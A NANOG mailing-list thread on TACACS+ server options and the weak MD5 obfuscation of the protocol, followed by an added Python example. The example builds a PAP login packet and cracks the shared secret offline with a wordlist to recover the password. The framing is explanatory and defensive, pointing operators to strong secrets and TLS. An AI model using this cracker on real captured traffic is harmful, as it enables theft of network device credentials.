On Wed, Sep 20, 2023 at 10:22 AM, Jim <mysi...@gmail.com> wrote:
> On Wed, Sep 20, 2023 at 11:16 AM Mike Lewinski via NANOG <nanog@nanog.org>
> wrote:
>
>> https://www.shrubbery.net/tac_plus/
>> That tac_plus has Python 2 dependencies and so has been removed from
>> Debian packages. That's not surprising given the last update was 2015 and
>> Python 2 was EOL in 2020: https://www.python.org/doc/sunset-python-2/
>>
>> Currently I favor this one, which is still being actively developed:
>> https://www.pro-bono-publico.de/projects/tac_plus.html
>
> Yes. Well, on the plus side, the TACACS protocol has not really changed
> in 30 years. Even the 2015 code could work provided you can compile its
> dependencies from sources, right...
>
> On the downside, for the command authorization use:
> TACACS+ provides little protection for messages between client and server.
>
> The protocol's MD5 crypto is so weak that routers using TACACS+ for
> authentication might as well just be piping over user credentials in the
> clear: it's barely any better.
Yes, but there is current work in the IETF OpsAWG WG to help address this:
https://datatracker.ietf.org/doc/draft-ietf-opsawg-tacacs-tls13/

This work was actually started many years ago, but got sidetracked — there was
no published standard for TACACS, and so we first published RFC 8907, "The
Terminal Access Controller Access-Control System Plus (TACACS+) Protocol"
<https://datatracker.ietf.org/doc/rfc8907/>, and this new document largely
says "Now just do that over TLS! kthxbye…"

Hopefully this draft will progress soon…

W

> Router operating systems still typically use only passwords with SSH, and
> then those devices send the passwords over that insecure channel. I have yet
> to see much in terms of routers capable of using TACACS+ to authorize users
> based on users' OpenSSH certificate, public key id, or ed25519-sk security
> key id, etc.
>
> In short, unless you have a VPN or a dedicated secure link from every single
> device to its TACACS server, or an experimental implementation of TACACS+
> over TLS, I would suggest considering using tools or scripts to distribute
> users and authorizing configurations to devices as local authorization
> through secure protocols, as favorable to those network authentication
> systems that transmit sensitive decisions and user data across the network
> using insecure protocols.
>
> --
> -Jim
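The "MD5 crypto" Jim refers to is the body obfuscation in RFC 8907 section 4.5: the packet body is XORed with a pad built from MD5(session_id, key, version, seq_no), while the 12-byte header stays in the clear. The following is an added example, not code from this thread or from either tac_plus project. It implements that pad, builds a PAP authentication START packet (the password rides in the START data field, per RFC 8907 section 5.4.2.3), and then shows why the obfuscation is barely better than cleartext: every input to the pad except the shared secret is visible in the header, and the first eight bytes of a START body are fixed-format, so one captured packet lets an attacker guess-and-check the shared secret offline and then read the password. The session id, usernames, passwords and wordlist are constructed for the example.

```python
"""RFC 8907 TACACS+ body obfuscation and an offline shared-secret guess attack.

Added example for illustration; not the code of any TACACS+ implementation.
All packet contents below are constructed for the demonstration.
"""
import hashlib
import struct
from typing import Iterable, Optional, Tuple

# Constants from RFC 8907 (sections 4.1, 5.1, 5.4.2.3).
TAC_PLUS_AUTHEN = 0x01             # header type: authentication packet
TAC_PLUS_AUTHEN_LOGIN = 0x01       # START action
TAC_PLUS_AUTHEN_TYPE_PAP = 0x02    # PAP: the password is the START data field
TAC_PLUS_AUTHEN_SVC_LOGIN = 0x01
VERSION_PAP = 0xC1                 # major version 0xC, minor version 1 for PAP
HEADER_LEN = 12


def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """RFC 8907 section 4.5 pseudo-pad:
       MD5_1 = MD5(session_id || key || version || seq_no)
       MD5_n = MD5(session_id || key || version || seq_no || MD5_{n-1})
    concatenated and truncated to the body length. session_id is the 4-byte
    header field in network byte order."""
    seed = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(seed + prev).digest()
        pad += prev
    return pad[:length]


def xor_body(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """Obfuscation and de-obfuscation are the same XOR with the pseudo-pad."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_pap_start(session_id: int, key: bytes, user: bytes, port: bytes,
                    rem_addr: bytes, password: bytes, priv_lvl: int = 1) -> bytes:
    """Client side: authentication START (RFC 8907 section 5.1) with a PAP password.
    Header in the clear, body XORed with the pad. seq_no is 1 for a START."""
    body = struct.pack("!BBBBBBBB", TAC_PLUS_AUTHEN_LOGIN, priv_lvl,
                       TAC_PLUS_AUTHEN_TYPE_PAP, TAC_PLUS_AUTHEN_SVC_LOGIN,
                       len(user), len(port), len(rem_addr), len(password))
    body += user + port + rem_addr + password
    seq_no, flags = 1, 0
    header = struct.pack("!BBBBII", VERSION_PAP, TAC_PLUS_AUTHEN, seq_no, flags,
                         session_id, len(body))
    return header + xor_body(body, session_id, key, VERSION_PAP, seq_no)


def plausible_start_body(body: bytes) -> bool:
    """Attacker's filter for a candidate key: a START body begins with eight
    fixed-format bytes, and its four length fields must sum to the body length
    already disclosed by the cleartext header. A wrong key yields random bytes
    that almost never satisfy all of this."""
    if len(body) < 8:
        return False
    action, priv_lvl, authen_type, service, ulen, plen, rlen, dlen = body[:8]
    return (action in (1, 2, 3) and priv_lvl <= 15 and 0 < authen_type <= 6
            and service <= 9 and 8 + ulen + plen + rlen + dlen == len(body))


def crack_shared_secret(packet: bytes, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline guess-and-check on one captured START packet: each candidate
    key costs one MD5 and an 8-byte structural check, no interaction needed."""
    version, ptype, seq_no, _flags, session_id, length = struct.unpack(
        "!BBBBII", packet[:HEADER_LEN])
    if ptype != TAC_PLUS_AUTHEN or seq_no != 1:
        return None
    ciphertext = packet[HEADER_LEN:HEADER_LEN + length]
    for key in candidates:
        if plausible_start_body(xor_body(ciphertext, session_id, key, version, seq_no)):
            return key
    return None


def recover_credentials(packet: bytes, key: bytes) -> Tuple[bytes, bytes]:
    """With the key known, de-obfuscate the body and extract user and password."""
    version, _ptype, seq_no, _flags, session_id, length = struct.unpack(
        "!BBBBII", packet[:HEADER_LEN])
    body = xor_body(packet[HEADER_LEN:HEADER_LEN + length], session_id, key, version, seq_no)
    ulen, plen, rlen, dlen = body[4:8]
    user = body[8:8 + ulen]
    start = 8 + ulen + plen + rlen
    return user, body[start:start + dlen]


if __name__ == "__main__":
    # Constructed capture: a router with a weak shared secret sends a PAP login.
    secret = b"cisco123"
    captured = build_pap_start(0x6B5E1C2A, secret, b"netops", b"tty0",
                               b"192.0.2.10", b"Winter2023!")
    wordlist = [b"tacacs", b"secret", b"cisco", b"cisco123", b"Summer2023"]
    found = crack_shared_secret(captured, wordlist)
    print("shared secret:", found)
    print("user, password:", recover_credentials(captured, found))
```

Two practical points follow from the code. A long random shared secret defeats this particular guess-and-check, but not the underlying design: the pad is a pure XOR keystream with no integrity check, so anyone who knows the plaintext of a packet (or the secret) can alter or forge packets, which is why RFC 8907 itself tells operators not to rely on the obfuscation and why the OpsAWG draft moves the whole exchange inside TLS. Until that is deployed, a check worth running is whether your TACACS+ secrets would fall to a short wordlist like the one above.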